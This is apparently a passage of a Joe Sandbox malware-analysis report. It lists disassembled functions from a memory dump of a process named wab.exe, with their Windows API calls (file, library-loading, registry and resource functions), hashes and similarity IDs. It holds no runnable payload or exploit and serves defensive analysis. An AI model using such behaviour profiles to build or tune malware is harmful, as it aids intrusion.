                                                                                                                                                                                          • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                          • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1481295809-0
                                                                                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                          • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                          • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
